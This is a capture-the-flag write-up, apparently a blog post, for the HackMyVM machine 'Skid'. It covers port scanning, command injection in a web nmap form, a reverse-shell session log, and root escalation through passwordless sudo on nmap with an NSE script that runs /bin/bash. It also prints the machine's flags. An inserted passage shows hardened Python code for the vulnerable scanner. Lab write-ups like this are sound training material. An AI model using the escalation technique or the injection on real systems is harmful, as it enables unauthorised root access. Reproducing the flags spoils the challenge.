HackMyVM-Skid

Twenty years of dust swept from its face, the stone carving beneath the gauze suddenly shines anew. No need for riddling words inscribed on yellow silk; lines this striking will pass themselves down.


Information gathering

./rustscan -a 192.168.56.198
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.198:22
Open 192.168.56.198:5000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-01 04:17 EST
Initiating ARP Ping Scan at 04:17
Scanning 192.168.56.198 [1 port]
Completed ARP Ping Scan at 04:17, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:17
Completed Parallel DNS resolution of 1 host. at 04:17, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 1, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 04:17
Scanning 192.168.56.198 [2 ports]
Discovered open port 22/tcp on 192.168.56.198
Discovered open port 5000/tcp on 192.168.56.198
Completed SYN Stealth Scan at 04:17, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.56.198
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-12-01 04:17:43 EST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
5000/tcp open upnp syn-ack ttl 64
MAC Address: 08:00:27:5E:86:C4 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

My information gathering still isn't good enough.

Port 5000 is a ping-scan page; command injection confirmed.

Nmap Scanner
Target:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-12-01 10:04 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000018s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp

Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
uid=1000(jeremy) gid=1000(jeremy) groups=1000(jeremy)


# Nmap 7.80 scan initiated Mon Dec 1 10:04:16 2025 as: nmap -T4 -oN /tmp/scan.txt 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000018s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp

# Nmap done at Mon Dec 1 10:04:16 2025 -- 1 IP address (1 host up) scanned in 0.03 seconds
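As an added defender-side example (not code from the original post and not the app running on the box), here is the shape of the bug behind the port 5000 scanner and its hardened form: the target string is spliced into a shell command line, so a separator turns it into a second command; the fix validates the target against an allow-list (one IP address or one plain hostname) and hands nmap an argv list with no shell. The function names and the nmap command line are assumptions reconstructed from the output above.

```python
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 style hostname: labels of letters, digits and hyphens, no leading
# hyphen, so a validated target can never be read by nmap as an option.
# Assumed policy for this example, not taken from the original app.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def is_valid_target(target: str) -> bool:
    """Allow-list check: exactly one IP address or one hostname, nothing else."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(target) is not None


def unsafe_command(target: str) -> str:
    """The vulnerable shape (assumed from the scan output): the raw form field
    is concatenated into a string that is then run through a shell, so any
    shell metacharacter in it is interpreted, not scanned."""
    return f"nmap -T4 -oN /tmp/scan.txt {target}"


def safe_argv(target: str) -> List[str]:
    """Hardened form: reject anything that is not a single target, then build an
    argv list. With shell=False there is no shell to interpret separators."""
    if not is_valid_target(target):
        raise ValueError("invalid scan target")
    return ["nmap", "-T4", "-oN", "/tmp/scan.txt", target]


def run_scan(target: str, timeout: int = 60) -> str:
    """Run the validated scan without a shell and return nmap's stdout."""
    proc = subprocess.run(
        safe_argv(target), shell=False, capture_output=True, text=True, timeout=timeout
    )
    return proc.stdout
```

Even with the argv fix in place, the scanner should not run as a user who can `sudo nmap` without a password, since any foothold on the app then escalates exactly as shown later in this post.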

Reverse shell

➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from skid-192.168.56.198-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/skid~192.168.56.198_Linux_x86_64/2025_12_01-04_18_31-873.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
jeremy@skid:~$ cd /home/
jeremy@skid:/home$ ls
jeremy
jeremy@skid:/home$ cd jeremy/
jeremy@skid:~$ ls
app changes.txt hacking-tools user.txt wordlists
jeremy@skid:~$ cat user.txt
hmv{7609a0e2e5bf272609dd3e12727eed76}
jeremy@skid:~$ sudo -l
Matching Defaults entries for jeremy on skid:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jeremy may run the following commands on skid:
(root) NOPASSWD: /usr/bin/nmap

Root


This part was annoying. I originally planned to use nmap's scanning features to read the flag, but /root/root.txt is a fake; the real one was hidden away in some obscure corner, and even after getting root it took me a while of digging to finally find the flag.

root@skid:/home/jeremy# cat shell 
os.execute("/bin/bash")
jeremy@skid:~$ sudo  nmap  --script=shell
Starting Nmap 7.80 ( https://nmap.org ) at 2025-12-01 09:47 UTC
NSE: Warning: Loading 'shell' -- the recommended file extension is '.nse'.
root@skid:/home/jeremy# id
uid=0(root) gid=0(root) groups=0(root)

root@skid:~# find / -name "root.txt" 2>/dev/null
/var/lib/.cache2/root.txt
/root/root.txt


Author: Skyarrow
Posted on: December 1, 2025
URL: http://example.com/2025/12/01/HackMyVM-Skid/